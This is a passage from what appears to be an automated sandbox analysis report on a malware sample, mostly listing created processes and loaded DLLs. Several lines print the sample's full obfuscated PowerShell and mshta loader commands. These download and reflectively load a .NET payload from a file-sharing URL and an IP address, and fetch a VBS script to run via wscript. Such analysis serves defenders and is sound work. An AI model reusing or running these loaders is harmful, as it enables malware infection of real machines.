9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
